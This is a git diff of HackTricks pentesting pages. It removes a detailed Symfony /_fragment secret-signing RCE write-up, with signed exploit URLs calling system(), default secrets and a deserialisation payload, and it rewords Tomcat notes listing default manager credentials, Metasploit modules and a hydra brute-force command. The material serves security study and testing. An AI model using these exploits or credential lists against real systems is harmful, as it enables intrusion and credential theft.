+* [https://web.dev/articles/security-headers](https://web.dev/articles/security-headers)
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/symphony.md b/network-services-pentesting/pentesting-web/symphony.md
index 44f5c73e0..7b3c73dab 100644
--- a/network-services-pentesting/pentesting-web/symphony.md
+++ b/network-services-pentesting/pentesting-web/symphony.md
@@ -14,542 +14,10 @@ Other ways to support HackTricks:
 
 </details>
 
-## Introduction <a href="#introduction" id="introduction"></a>
-
-Since its creation in 2008, the use of the [Symfony](https://symfony.com) framework has been growing more and more in PHP based applications. It is now a core component of many well known CMSs, such as [Drupal](https://www.drupal.org), [Joomla!](https://www.joomla.org), [eZPlatform](https://ezplatform.com) (formerly eZPublish), or [Bolt](https://bolt.cm), and is often used to build custom websites.
-
-One of Symfony's built-in features, made to handle [ESI (Edge-Side Includes)](https://en.wikipedia.org/wiki/Edge\_Side\_Includes), is the [`FragmentListener` class](https://github.com/symfony/symfony/blob/5.1/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php). Essentially, when someone issues a request to `/_fragment`, this listener sets request attributes from given GET parameters. Since this allows to **run arbitrary PHP code** (_more on this later_), the request has to be signed using a HMAC value. This HMAC's secret cryptographic key is stored under a Symfony configuration value named `secret`.
-
-This configuration value, `secret`, is also used, for instance, to build CSRF tokens and remember-me tokens. Given its importance, this value must obviously be very random.
-
-Unfortunately, we discovered that oftentimes, the secret either has a **default value**, or there exist **ways to obtain the value, bruteforce it offline, or to purely and simply bypass the security check that it is involved with**. It most notably affects Bolt, eZPlatform, and eZPublish.
-
-Although this may seem like a begnin configuration issue, we have found that default, bruteforceable or guessable values are **very, very often present** in the mentioned CMSs as well as in custom applications. This is mainly due to not putting enough emphasis on its importance in the documentation or installation guides.
-
-Furthermore, an attacker can escalate less-impactful vulnerabilities to either read the `secret` (through a file disclosure), bypass the `/_fragment` signature process (using an SSRF), and even leak it through `phpinfo()` !
-
-In this blogpost, we'll describe how the secret can be obtained in various CMSs and on the base framework, and how to get code execution using said secret.
-
-## A little bit of history <a href="#a-little-bit-of-history" id="a-little-bit-of-history"></a>
-
-Being a modern framework, Symfony has had to deal with generating sub-parts of a request from its creation to our times. Before `/_fragment`, there was `/_internal` and `/_proxy`, which did essentially the same thing. It produced a lot of vulnerabilities through the years: [CVE-2012-6432](https://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released#cve-2012-6432-code-execution-vulnerability-via-the-internal-routes), [CVE-2014-5245](https://symfony.com/blog/cve-2014-5245-direct-access-of-esi-urls-behind-a-trusted-proxy), and [CVE-2015-4050](https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access), for instance.
-
-Since Symfony 4, the secret is generated on installation, and the `/_fragment` page is disabled by default. One would think, therefore, that the conjunction of both having a weak `secret`, and enabled `/_fragment`, would be rare. It is not: many frameworks rely on old Symfony versions (even 2.x is very present still), and implement either a static `secret` value, or generate it poorly. Furthermore, many rely on ESI and as such enable the `/_fragment` page. Also, as we'll see, other lower-impact vulnerabilities can allow to dump the secret, even if it has been securely generated.
-
-## Executing code with the help of `secret` <a href="#executing-code-with-the-help-of-secret" id="executing-code-with-the-help-of-secret"></a>
-
-We'll first demonstrate how an attacker, having knowledge of the `secret` configuration value, can obtain code execution. This is done for the last `symfony/http-kernel` version, but is similar for other versions.
-
-### Using `/_fragment` to run arbitrary code <a href="#using-_fragment-to-run-arbitrary-code" id="using-_fragment-to-run-arbitrary-code"></a>
-
-As mentioned before, we will make use of the `/_fragment` page.
-
-```php
-# ./vendor/symfony/http-kernel/EventListener/FragmentListener.php
-
-class FragmentListener implements EventSubscriberInterface
-{
-    public function onKernelRequest(RequestEvent $event)
-    {
-        $request = $event->getRequest();
-
-        # [1]
-        if ($this->fragmentPath !== rawurldecode($request->getPathInfo())) {
-            return;
-        }
-
-        if ($request->attributes->has('_controller')) {
-            // Is a sub-request: no need to parse _path but it should still be removed from query parameters as below.
-            $request->query->remove('_path');
-
-            return;
-        }
-
-        # [2]
-        if ($event->isMasterRequest()) {
-            $this->validateRequest($request);
-        }
-
-        # [3]
-        parse_str($request->query->get('_path', ''), $attributes);
-        $request->attributes->add($attributes);
-        $request->attributes->set('_route_params', array_replace($request->attributes->get('_route_params', []), $attributes));
-        $request->query->remove('_path');
-    }
-}
-```
-
-`FragmentListener:onKernelRequest` will be run on every request: if the request's path is `/_fragment` \[1], the method will first check that the request is valid (_i.e._ properly signed), and raise an exception otherwise \[2]. If the security checks succeed, it will parse the url-encoded `_path` parameter, and set `$request` attributes accordingly.
-
-Request attributes are not to be mixed up with HTTP request parameters: they are internal values, maintained by Symfony, that usually cannot be specified by a user. One of these request attributes is `_controller`, which specifies which Symfony controller (a _(class, method)_ tuple, or simply a _function_) is to be called. Attributes whose name does not start with `_` are arguments that are going to be fed to the controller. For instance, if we wished to call this method:
-
-```php
-class SomeClass
-{
-    public function someMethod($firstMethodParam, $secondMethodParam)
-    {
-        ...
-    } 
-}
-```
-
-We'd set `_path` to:
-
-`_controller=SomeClass::someMethod&firstMethodParam=test1&secondMethodParam=test2`
-
-The request would then look like this:
-
-`http://symfony-site.com/_fragment?_path=_controller%3DSomeClass%253A%253AsomeMethod%26firstMethodParam%3Dtest1%26secondMethodParam%3Dtest2&_hash=...`
-
-Essentially, this allows to call any function, or any method of any class, with any parameter. Given the plethora of classes that Symfony has, **getting code execution is trivial**. We can, for instance, call `system()`:
-
-`http://localhost:8000/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=...`
-
-_Calling system won't work every time: refer to the Exploit section for greater details about exploitation subtilities._
-
-One problem remains: how does Symfony verify the signature of the request?
-
-### Signing the URL <a href="#signing-the-url" id="signing-the-url"></a>
-
-To verify the signature of an URL, an HMAC is computed against the _full_ URL. The obtained hash is then compared to the one specified by the user.
-
-Codewise, this is done in two spots:
-
-```php
-# ./vendor/symfony/http-kernel/EventListener/FragmentListener.php
-
-class FragmentListener implements EventSubscriberInterface
-{
-    protected function validateRequest(Request $request)
-    {
-        // is the Request safe?
-        if (!$request->isMethodSafe()) {
-            throw new AccessDeniedHttpException();
-        }
-
-        // is the Request signed?
-        if ($this->signer->checkRequest($request)) {
-            return;
-        }
-
-        # [3]
-        throw new AccessDeniedHttpException();
-    }
-}
-
-# ./vendor/symfony/http-kernel/UriSigner.php
-
-class UriSigner
-{
-    public function checkRequest(Request $request): bool
-    {
-        $qs = ($qs = $request->server->get('QUERY_STRING')) ? '?'.$qs : '';
-
-        // we cannot use $request->getUri() here as we want to work with the original URI (no query string reordering)
-        return $this->check($request->getSchemeAndHttpHost().$request->getBaseUrl().$request->getPathInfo().$qs);
-    }
-
-    /**
-     * Checks that a URI contains the correct hash.
-     *
-     * @return bool True if the URI is signed correctly, false otherwise
-     */
-    public function check(string $uri)
-    {
-        $url = parse_url($uri);
-        if (isset($url['query'])) {
-            parse_str($url['query'], $params);
-        } else {
-            $params = [];
-        }
-
-        if (empty($params[$this->parameter])) {
-            return false;
-        }
-
-        $hash = $params[$this->parameter];
-        unset($params[$this->parameter]);
-
-        # [2]
-        return hash_equals($this->computeHash($this->buildUrl($url, $params)), $hash);
-    }
-
-    private function computeHash(string $uri): string
-    {
-        # [1]
-        return base64_encode(hash_hmac('sha256', $uri, $this->secret, true));
-    }
-
-    private function buildUrl(array $url, array $params = []): string
-    {
-        ksort($params, SORT_STRING);
-        $url['query'] = http_build_query($params, '', '&');
-
-        $scheme = isset($url['scheme']) ? $url['scheme'].'://' : '';
-        $host = isset($url['host']) ? $url['host'] : '';
-        $port = isset($url['port']) ? ':'.$url['port'] : '';
-        $user = isset($url['user']) ? $url['user'] : '';
-        $pass = isset($url['pass']) ? ':'.$url['pass'] : '';
-        $pass = ($user || $pass) ? "$pass@" : '';
-        $path = isset($url['path']) ? $url['path'] : '';
-        $query = isset($url['query']) && $url['query'] ? '?'.$url['query'] : '';
-        $fragment = isset($url['fragment']) ? '#'.$url['fragment'] : '';
-
-        return $scheme.$user.$pass.$host.$port.$path.$query.$fragment;
-    }
-}
-```
-
-In short, Symfony extracts the `_hash` GET parameter, then reconstructs the full URL, for instance `https://symfony-site.com/_fragment?_path=controller%3d...%26argument1=test%26...`, computes an HMAC from this URL using the `secret` as key \[1], and compares it to the given hash value \[2]. If they don't match, a `AccessDeniedHttpException` exception is raised \[3], resulting in a `403` error.
-
-### Example <a href="#example" id="example"></a>
-
-To test this, let's setup a test environment, and extract the secret (in this case, randomly generated).
-
-```
-$ git clone https://github.com/symfony/skeleton.git
-$ cd skeleton
-$ composer install
-$ sed -i -E 's/#(esi|fragment)/\1/g' config/packages/framework.yaml # Enable ESI/fragment
-$ grep -F APP_SECRET .env # Find secret
-APP_SECRET=50c8215b436ebfcc1d568effb624a40e
-$ cd public
-$ php -S 0:8000
-```
-
-Now, visiting `http://localhost:8000/_fragment` yields a `403`. Let's now try and provide a valid signature:
-
-```
-$ php -r "echo(urlencode(base64_encode(hash_hmac('sha256', 'http://localhost:8000/_fragment', '50c8215b436ebfcc1d568effb624a40e', 1))) . PHP_EOL);"
-lNweS5nNP8QCtMqyqrW8HIl4j9JXIfscGeRm%2FcmFOh8%3D
-```
-
-By checking out `http://localhost:8000/_fragment?_hash=lNweS5nNP8QCtMqyqrW8HIl4j9JXIfscGeRm%2FcmFOh8%3D`, we now have a `404` status code. The signature was correct, but we did not specify any request attribute, so Symfony does not find our controller.
-
-Since we can call any method, with any argument, we can for instance pick `system($command, $return_value)`, and provide a payload like so:
-
-```
-$ page="http://localhost:8000/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull"
-$ php -r "echo(urlencode(base64_encode(hash_hmac('sha256', '$page', '50c8215b436ebfcc1d568effb624a40e', 1))) . PHP_EOL);"
-GFhQ4Hr1LIA8mO1M%2FqSfwQaSM8xQj35vPhyrF3hvQyI%3D
-```
-
-We can now visit the exploit URL: `http://localhost:8000/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=GFhQ4Hr1LIA8mO1M%2FqSfwQaSM8xQj35vPhyrF3hvQyI%3D`.
-
-Despite the `500` error, we can see that **our command got executed**.
-
-_RCE using fragment_
-
-![1](https://www.ambionics.io/images/symfony-secret-fragment/1.png)
-
-## Finding secrets <a href="#finding-secrets" id="finding-secrets"></a>
-
-Again: all of this would not matter if secrets were not obtainable. Oftentimes, they are. We'll describe several ways of getting code execution without any prior knowledge.
-
-### Through vulnerabilities <a href="#through-vulnerabilities" id="through-vulnerabilities"></a>
-
-Let's start with the obvious: using lower-impact vulnerabilities to obtain the secret.
-
-#### File read <a href="#file-read" id="file-read"></a>
-
-Evidently, a file read vulnerability could be used to read the following files, and obtain `secret`:
-
-* `app/config/parameters.yml`
-* `.env`
-
-_As an example, some Symfony debug toolbars allow you to read files._
-
-#### PHPinfo <a href="#phpinfo" id="phpinfo"></a>
-
-On recent symfony versions (3.x), `secret` is stored in `.env` as `APP_SECRET`. Since it is then imported as an environment variable, they can be seen through a `phpinfo()` page.
-
-_Leaking APP\_SECRET through phpinfo_
-
-![2](https://www.ambionics.io/images/symfony-secret-fragment/2.png)
-
-This can most notably be done through Symfony's profiler package, as demonstrated by the screenshot.
-
-#### SSRF / IP spoofing (CVE-2014-5245) <a href="#ssrf-ip-spoofing-cve-2014-5245" id="ssrf-ip-spoofing-cve-2014-5245"></a>
-
-The code behind `FragmentListener` has evolved through the years: up to version _2.5.3_, when the request came from a trusted proxy (read: `localhost`), it would be considered safe, and as such the hash would not be checked. An SSRF, for instance, can allow to immediately run code, regardless of having `secret` or not. This notably affects eZPublish up to 2014.7.
-
-```php
-# ./vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php
-# Symfony 2.3.18
-
-class FragmentListener implements EventSubscriberInterface
-{
-    protected function validateRequest(Request $request)
-    {
-        // is the Request safe?
-        if (!$request->isMethodSafe()) {
-            throw new AccessDeniedHttpException();
-        }
-
-        // does the Request come from a trusted IP?
-        $trustedIps = array_merge($this->getLocalIpAddresses(), $request->getTrustedProxies());
-        $remoteAddress = $request->server->get('REMOTE_ADDR');
-        if (IpUtils::checkIp($remoteAddress, $trustedIps)) {
-            return;
-        }
-
-        // is the Request signed?
-        // we cannot use $request->getUri() here as we want to work with the original URI (no query string reordering)
-        if ($this->signer->check($request->getSchemeAndHttpHost().$request->getBaseUrl().$request->getPathInfo().(null !== ($qs = $request->server->get('QUERY_STRING')) ? '?'.$qs : ''))) {
-            return;
-        }
-
-        throw new AccessDeniedHttpException();
-    }
-
-    protected function getLocalIpAddresses()
-    {
-        return array('127.0.0.1', 'fe80::1', '::1');
-    }
-```
-
-Admittedly, all of those techniques require another vulnerability. Let's dive into an even better vector: default values.
-
-### Through default values <a href="#through-default-values" id="through-default-values"></a>
-
-#### Symfony <= 3.4.43: `ThisTokenIsNotSoSecretChangeIt` <a href="#symfony-3443-thistokenisnotsosecretchangeit" id="symfony-3443-thistokenisnotsosecretchangeit"></a>
-
-When setting up a Symfony website, the first step is to install the [symfony-standard](https://github.com/symfony/symfony-standard) skeleton. When installed, a prompt asks for some configuration values. By default, the key is `ThisTokenIsNotSoSecretChangeIt`.
-
-_Installation of Symfony through composer_
-
-![3](https://www.ambionics.io/images/symfony-secret-fragment/3.png)
-
-On later versions (4+), the secret key is generated securely.
-
-#### ezPlatform 3.x (latest): `ff6dc61a329dc96652bb092ec58981f7` <a href="#ezplatform-3x-latest-ff6dc61a329dc96652bb092ec58981f7" id="ezplatform-3x-latest-ff6dc61a329dc96652bb092ec58981f7"></a>
-
-[ezPlatform](https://ezplatform.com), the successor of [ezPublish](https://en.wikipedia.org/wiki/EZ\_Publish), still uses Symfony. On Jun 10, 2019, a [commit](https://github.com/ezsystems/ezplatform/commit/974f2a70d9d0507ba7ca17226693b1a4967f23cf#diff-f579cccc964135c7d644c7b2d3b0d3ecR59) set the default key to `ff6dc61a329dc96652bb092ec58981f7`. Vulnerable versions range from 3.0-alpha1 to 3.1.1 (current).
-
-Although the [documentation](https://doc.ezplatform.com/en/latest/getting\_started/install\_ez\_platform/#change-installation-parameters) states that the secret should be changed, it is not enforced.
-
-#### ezPlatform 2.x: `ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt` <a href="#ezplatform-2x-thisezplatformtokenisnotsosecret_pleasechangeit" id="ezplatform-2x-thisezplatformtokenisnotsosecret_pleasechangeit"></a>
-
-Like Symfony's skeleton, you will be prompted to enter a secret during the installation. The default value is `ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt`.
-
-#### Bolt CMS <= 3.7 (latest): `md5(__DIR__)` <a href="#bolt-cms-37-latest-md5__dir__" id="bolt-cms-37-latest-md5__dir__"></a>
-
-[Bolt CMS](https://bolt.cm) uses [Silex](https://github.com/silexphp/Silex), a deprecated micro-framework based on Symfony. It sets up the secret key using this computation:
-
-```php
-# ./vendor/silex/silex/src/Silex/Provider/HttpFragmentServiceProvider.php
-$app['uri_signer.secret'] = md5(__DIR__);
-
-# ./vendor/silex/silex/src/Silex/Provider/FormServiceProvider.php
-$app['form.secret'] = md5(__DIR__);
-```
-
-As such, one can guess the secret, or use a Full Path Disclosure vulnerability to compute it.
-
-If you did not succeed with default secret keys, do not despair: there are other ways.
-
-### Bruteforce <a href="#bruteforce" id="bruteforce"></a>
-
-Since the secret is often set manually (as opposed to generated randomly), people will often use a passphrase instead of a secure random value, which makes it bruteforceable if we have a hash to bruteforce it against. Obviously, a valid `/_fragment` URL, such as one generated by Symfony, would provide us a valid message-hash tuple to bruteforce the secret.
-
-_A valid request to fragment is included in the response_
-
-![4](https://www.ambionics.io/images/symfony-secret-fragment/4.png)
-
-At the beginning of this blogpost, we said that Symfony's secret had several uses. One of those uses is that it is also used to generate CSRF tokens. Another use of `secret` is to sign remember-me cookies. In some cases, an attacker can use his own CSRF token or remember-me cookie to bruteforce the value of `secret`.
-
-_The reverse engineering of the construction of those tokens is left as an exercise to the reader._
-
-### Going further: eZPublish <a href="#going-further-ezpublish" id="going-further-ezpublish"></a>
-
-As an example to how secrets can be bruteforced in order to achieve code execution, we'll see how we can find out eZPublish 2014.07's secret.
-
-#### Finding bruteforce material <a href="#finding-bruteforce-material" id="finding-bruteforce-material"></a>
-
-eZPublish generates its CSRF tokens like this:
-
-```php
-# ./ezpublish_legacy/extension/ezformtoken/event/ezxformtoken.php
-self::$token = sha1( self::getSecret() . self::getIntention() . session_id() );
-```
-
-To build this token, eZP uses two values we know, and the secret: `getIntention()` is the action the user is attempting (`authenticate` for instance), `session_id()` is the PHP session ID, and `getSecret()`, well, is Symfony's `secret`.
-
-Since CSRF tokens can be found on some forms, we now have the material to bruteforce the secret.
-
-Unfortunately, ezPublish incorporated a bundle from sensiolabs, [sensio/distribution-bundle](https://packagist.org/packages/sensio/distribution-bundle). This package makes sure the secret key is random. It generates it like this, upon installation:
-
-```php
-# ./vendor/sensio/distribution-bundle/Sensio/Bundle/DistributionBundle/Configurator/Step/SecretStep.php
-
-private function generateRandomSecret()
-{
-    return hash('sha1', uniqid(mt_rand()));
-}
-```
-
-This looks really hard to bruteforce: `mt_rand()` can yield 231 different values, and `uniqid()` is built from the current timestamp (with microseconds).
-
-```php
-// Simplified uniqid code
-
-struct timeval tv;
-gettimeofday(&tv, NULL);
-return strpprintf(0, "%s%08x%05x", prefix, tv.tv_sec, tv.tv_usec);
-```
-
-#### Disclosing the timestamp <a href="#disclosing-the-timestamp" id="disclosing-the-timestamp"></a>
-
-Luckily, we know this secret gets generated on the last step of the installation, right after the website gets set up. This means we can probably leak the timestamp used to generate this hash.
-
-One way to do so is using the logs (_e.g._ `/var/log/storage.log`); one can leak the first time a cache entry was created. The cache entry gets created right after `generateRandomSecret()` is called.
-
-_Sample log contents: the timestamp is similar to the one used to compute secret_
-
-![5](https://www.ambionics.io/images/symfony-secret-fragment/5.png)
-
-If logs aren't available, one can use the very powerful search engine of eZPublish to find the time of creation of the very first element of the website. Indeed, when the site is created, a lot of timestamps are put into the database. This means that the timestamp of the initial data of the eZPublish website is the same as the one used to compute `uniqid()`. We can look for the `landing_page` _ContentObject_ and find out its timestamp.
-
-## Bruteforcing the missing bits <a href="#bruteforcing-the-missing-bits" id="bruteforcing-the-missing-bits"></a>
-
-We are now aware of the timestamp used to compute the secret, as well as a hash of the following form:
-
-```php
-$random_value = mt_rand();
-$timestamp_hex = sprintf("%08x%05x", $known_timestamp, $microseconds);
-$known_plaintext = '<intention><sessionID>';
-$known_hash = sha1(sha1(mt_rand() . $timestamp_hex) . $known_plaintext);
-```
-
-This leaves us with a total of 231 \* 106 possibilities. It feels doable with [hashcat](https://hashcat.net) and a good set of GPUs, but hashcat does not provide a `sha1(sha1($pass).$salt)` kernel. Luckily, we implemented it! You can find [the pull-request here](https://github.com/hashcat/hashcat/pull/2536).
-
-Using our cracking machine, which boasts 8 GPUs, we can crack this hash in _under 20 hours_.
-
-After getting the hash, we can use `/_fragment` to execute code.
-
-## Conclusion <a href="#conclusion" id="conclusion"></a>
-
-Symfony is now a core component of many PHP applications. As such, any security risk that affects the framework affects lots of websites. As demonstrated in this article, either a weak secret or a less-impactful vulnerability allows attackers to obtain **remote code execution**.
-
-As a blue teamer, you should have a look at every of your Symfony-dependent websites. Up-to-date software cannot be ruled out for vulnerabilities, as the secret key is generated at the first installation of the product. Hence, if you created a Symfony-3.x-based website a few years ago, and kept it up-to-date along the way, chances are the secret key is still the default one.
-
-## Exploitation <a href="#exploitation" id="exploitation"></a>
-
-### Theory <a href="#theory" id="theory"></a>
-
-On the first hand, we have a few things to worry about when exploiting this vulnerability:
-
-* The HMAC is computed using the **full URL**. If the website is behind a reverse proxy, we need to use the internal URL of the service instead of the one we're sending our payload to. For instance, the internal URL might be over HTTP instead of HTTPS.
-* The HMAC's algorithm changed over the years: it was **SHA-1** before, and is now **SHA-256**.
-* Since Symfony removes the `_hash` parameter from the request, and then generates the URL again, we need to compute the hash on the same URL as it does.
-* Lots of secrets can be used, so we need to check them all.
-* On some PHP versions, we cannot call functions which have "by-reference" parameters, such as `system($command, &$return_value)`.
-* On some Symfony versions, `_controller` cannot be a function, it has to be a method. We need to find a Symfony method that allows us to execute code.
-
-On the other hand, we can take advantage of a few things:
-
-* Hitting `/_fragment` with no params, or with an invalid hash, should return a `403`.
-* Hitting `/_fragment` with a valid hash but without a valid controller should yield a `500`.
-
-The last point allows us to test secret values without worrying about which function or method we are going to call afterwards.
-
-### Practice <a href="#practice" id="practice"></a>
-
-Let's say we are attacking `https://target.com/_fragment`. To be able to properly sign a URL, we need knowledge of:
-
-* Internal URL: it could be `https://target.com/_fragment`, or maybe `http://target.com/_fragment`, or else something entirely different (_e.g._ `http://target.website.internal`), which we can't guess
-* Secret key: we have a list of usual secret keys, such as `ThisTokenIsNotSoSecretChangeIt`, `ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt`, etc.
-* Algorithm: SHA1 or SHA256
-
-We do not need to worry about the effective payload (the contents of `_path`) yet, because a properly signed URL will not result in an `AccessDeniedHttpException` being thrown, and as such won't result in a `403`. The exploit will therefore try each `(algorithm, URL, secret)` combination, generate an URL, and check if it does not yield a `403` status code.
-
-_A valid request to `/_fragment`, without `_path` parameter_
-
-![6](https://www.ambionics.io/images/symfony-secret-fragment/6.png)
-
-At this point, we can sign any `/_fragment` URL, which means it's a garantied RCE. It is just a matter of what to call.
-
-Then, we need to find out if we can call a function directly, or if we need to use a class method. We can first try the first, most straightforward way, using a function such as `phpinfo ([ int $what = INFO_ALL ] )` ([documentation](https://www.php.net/manual/en/function.phpinfo.php)). The `_path` GET parameter would look like this:
-
-```
-_controller=phpinfo
-&what=-1
-```
-
-And the URL would look like this:
-
-`http://target.com/_fragment?_path=_controller%3Dphpinfo%26what%3D-1&_hash=...`
-
-If the HTTP response displays a `phpinfo()` page, we won. We can then try and use another function, such as `assert`:
-
-_Sample output using `_controller=assert`_
-
-![7](https://www.ambionics.io/images/symfony-secret-fragment/7.png)
-
-Otherwise, this means that we'll need to use a class method instead. A good candidate for this is `Symfony\Component\Yaml\Inline::parse`, which is a built-in Symfony class, and as such is present on Symfony websites.
-
-Obviously, this method parses a YAML input string. Symfony's [YAML](https://yaml.org) parser supports the `php/object` tag, which will convert a serialized input string into an object using `unserialize()`. This lets us use our favorite PHP tool, [PHPGGC](https://github.com/ambionics/phpggc) !
-
-The method prototype has changed over the years. For instance, here are three different prototypes:
-
-```
-public static function parse($value, $flags, $references);
-public static function parse($value, $exceptionOnInvalidType, $objectSupport);
-public static function parse($value, $exceptionOnInvalidType, $objectSupport, $objectForMap, $references);
-```
-
-Instead of building `_path` for each one of these, we can take advantage of the fact that if we give an argument whose name does not match the method prototype, it will be ignored. We can therefore add every possible argument to the method, without worrying about the actual prototype.
-
-We can therefore build `_path` like this:
-
-```
-_controller=Symfony\Component\Yaml\Inline::parse
-&value=!php/object O:32:"Monolog\Handler\SyslogUdpHandler":...
-&flags=516
-&exceptionOnInvalidType=0
-&objectSupport=1
-&objectForMap=0
-&references=
-&flags=516
-```
-
-Again, we can try with `phpinfo()`, and see if it works out. If it does, we can use `system()` instead.
-
-_Sample output using `Inline::parse` with a serialized payload_
-
-![8](https://www.ambionics.io/images/symfony-secret-fragment/8.png)
-
-The exploit will therefore run through every possible variable combination, and then try out the two exploitation methods. The code is available on [our GitHub](https://github.com/ambionics/symfony-exploits).
-
-## Accessing symfony /\_profiler information
-
-![f:id:flattsecurity:20201021204553p:plain](https://cdn-ak.f.st-hatena.com/images/fotolife/f/flattsecurity/20201021/20201021204553.png)
-
-As you see the screenshot above, there is `sf` logo on the right bottom side of the page. This logo is shown when the Symfony is under the debug mode. There are some cases that this logo doesn’t show up, so try accessing `/_profiler` and you will see the page as shown below
-
-![f:id:flattsecurity:20201021204605p:plain](https://cdn-ak.f.st-hatena.com/images/fotolife/f/flattsecurity/20201021/20201021204605.png)
-
-This feature is called Symfony Profiler, and there is not much information about this feature on the internet. The intention of this feature crystal clear; it helps you debug when there is an error or a bug. Of course, this feature can only be used when the debug mode is enabled.
-
-The Symfony framework itself is very secure, but enabling debug mode will make this framework will make it extremely vulnerable. For example, Profiler has a feature called Profile Search, as the following screenshot.
-
-![f:id:flattsecurity:20201021204624p:plain](https://cdn-ak.f.st-hatena.com/images/fotolife/f/flattsecurity/20201021/20201021204624.png)
-
-As you see in the screenshot above, you can access all sent requests to the server. By clicking hashes in the token, you will see that all POST parameters can be read, as seen in the following screenshot. With this feature, we can hijack the administrator and user’s account credentials.
-
-![f:id:flattsecurity:20201021204637p:plain](https://cdn-ak.f.st-hatena.com/images/fotolife/f/flattsecurity/20201021/20201021204637.png)
-
-### Other Debug Enabled Endpoints
-
-You should also check these URLs:
-
-* **https://example.com/app\_dev.php/\_profiler**
-* **https://example.com/app\_dev.php**\\
-
-## References
+Take a look to the following posts:
 
 * [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
-* [**https://flattsecurity.hatenablog.com/entry/2020/11/02/124807**](https://flattsecurity.hatenablog.com/entry/2020/11/02/124807)
+* [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
 * [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
 
 <details>
diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md
index 807247217..7083f9be8 100644
--- a/network-services-pentesting/pentesting-web/tomcat.md
+++ b/network-services-pentesting/pentesting-web/tomcat.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -29,74 +29,57 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ## Enumeration
 
-### Version
-
+### **Version Identification**
+To find the version of Apache Tomcat, a simple command can be executed:
 ```bash
 curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat 
-
-<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author" 
 ```
+This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
 
-### Locate manager files
-
-It's interesting to find where are the pages **`/manager`** and **`/host-manager`** as they might have a different name. You can search them with a brute-force.
-
-### Username Enum
-
-In some versions prior to Tomcat6 you could enumerate users:
+### **Manager Files Location**
+Identifying the exact locations of **`/manager`** and **`/host-manager`** directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages.
 
+### **Username Enumeration**
+For Tomcat versions older than 6, it's possible to enumerate usernames through:
 ```bash
 msf> use auxiliary/scanner/http/tomcat_enum
 ```
 
-### Default credentials
-
-The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
-
-* admin:admin
-* tomcat:tomcat
-* admin:\<NOTHING>
-* admin:s3cr3t
-* tomcat:s3cr3t
-* admin:tomcat
-
-You could test these and more using:
+### **Default Credentials**
+The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:
+- admin:admin
+- tomcat:tomcat
+- admin:<NOTHING>
+- admin:s3cr3t
+- tomcat:s3cr3t
+- admin:tomcat
 
+These credentials can be tested using:
 ```bash
 msf> use auxiliary/scanner/http/tomcat_mgr_login
 ```
 
-Another **interesting Tomcat** path is _**/manager/status**_, where you can see the version of the OS and Tomcat. This is useful to find vulns affecting the version of Tomcat when you cannot access _**/manager/html.**_
-
-### Bruteforce
+Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification.
 
+### **Brute Force Attack**
+To attempt a brute force attack on the manager directory, one can use:
 ```bash
 hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
-
-msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal
-msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
-msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
-msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>
 ```
+Along with setting various parameters in Metasploit to target a specific host.
 
-## Vulns
+## Common Vulnerabilities
 
-### Password backtrace disclosure
+### **Password Backtrace Disclosure**
+Accessing `/auth.jsp` may reveal the password in a backtrace under fortunate circumstances.
 
-Try to access `/auth.jsp` and if you are very lucky it **might disclose the password in a backtrace**.
